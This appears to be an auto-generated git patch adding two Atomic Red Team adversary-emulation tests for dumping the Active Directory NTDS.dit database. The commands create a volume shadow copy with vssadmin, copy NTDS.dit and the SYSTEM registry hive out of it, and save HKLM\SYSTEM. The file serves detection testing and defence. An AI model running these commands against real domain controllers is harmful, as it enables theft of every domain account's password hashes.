From e049f7dc4beceed9db1f07a10f8ab2f08b6ec1fa Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Mon, 6 May 2019 16:17:00 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master

---
 atomics/T1003/T1003.md   | 47 ++++++++++++++++++++++++++++++++++++++++
 atomics/index.md         |  2 ++
 atomics/index.yaml       | 40 ++++++++++++++++++++++++++++++++++
 atomics/windows-index.md |  2 ++
 4 files changed, 91 insertions(+)

diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index 6f2bdc75..768817ec 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -151,6 +151,10 @@ The /proc filesystem on Linux contains a great deal of information regarding the
 - [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil)
+- [Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit](#atomic-test-9---create-volume-shadow-copy-with-ntdsdit)
+
+- [Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy](#atomic-test-10---copy-ntdsdit-from-volume-shadow-copy)
+
@@ -305,3 +309,46 @@ subsequent domain controllers without the need of network-based replication.
 ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
 ```
+
+
+## Atomic Test #9 - Create Volume Shadow Copy with NTDS.dit
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| drive_letter | Drive letter to source VSC (including colon) | String | C:|
+
+#### Run it with `command_prompt`!
+```
+vssadmin.exe create shadow /for=#{drive_letter}
+```
+
+
+
+## Atomic Test #10 - Copy NTDS.dit from Volume Shadow Copy
+The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
+
+This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
+A successful test also requires the export of the SYSTEM Registry hive.
+This test must be executed on a Windows Domain Controller.
+
+**Supported Platforms:** Windows
+
+
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
+| extract_path | Path for extracted NTDS.dit | Path | C:\Extract|
+
+#### Run it with `command_prompt`!
+```
+copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
+copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
+reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
+```
+
diff --git a/atomics/index.md b/atomics/index.md
index 0fd017ec..63d81599 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -506,6 +506,8 @@
   - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
   - Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
   - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows]
+  - Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows]
+  - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
 - [T1081 Credentials in Files](./T1081/T1081.md)
   - Atomic Test #1: Browser and System credentials [macos]
   - Atomic Test #2: Extract credentials from files [macos, linux]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 22335aed..3c9760ef 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -14318,6 +14318,46 @@ credential-access:
         command: 'ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q

'
+    - name: Create Volume Shadow Copy with NTDS.dit
+      description: 'The Active Directory database NTDS.dit may be dumped by copying
+        it from a Volume Shadow Copy.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        drive_letter:
+          description: Drive letter to source VSC (including colon)
+          type: String
+          default: 'C:'
+      executor:
+        name: command_prompt
+        command: 'vssadmin.exe create shadow /for=#{drive_letter}
+
+'
+    - name: Copy NTDS.dit from Volume Shadow Copy
+      description: "The Active Directory database NTDS.dit may be dumped by copying
+        it from a Volume Shadow Copy.\n\nThis test requires steps taken in the test
+        \"Create Volume Shadow Copy with NTDS.dit\".\nA successful test also requires
+        the export of the SYSTEM Registry hive. \nThis test must be executed on a
+        Windows Domain Controller.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        vsc_name:
+          description: Name of Volume Shadow Copy
+          type: String
+          default: "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1"
+        extract_path:
+          description: Path for extracted NTDS.dit
+          type: Path
+          default: C:\Extract
+      executor:
+        name: command_prompt
+        command: |-
+          copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
+          copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
+          reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
   T1081:
     technique:
       external_references:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 11ebfa94..3cf550a2 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -342,6 +342,8 @@
   - Atomic Test #6: Dump LSASS.exe Memory using Windows Task Manager [windows]
   - Atomic Test #7: Offline Credential Theft With Mimikatz [windows]
   - Atomic Test #8: Dump Active Directory Database with NTDSUtil [windows]
+  - Atomic Test #9: Create Volume Shadow Copy with NTDS.dit [windows]
+  - Atomic Test #10: Copy NTDS.dit from Volume Shadow Copy [windows]
 - [T1081 Credentials in Files](./T1081/T1081.md)
   - Atomic Test #3: Mimikatz & Kittenz [windows]
   - Atomic Test #4: Extracting credentials from files [windows]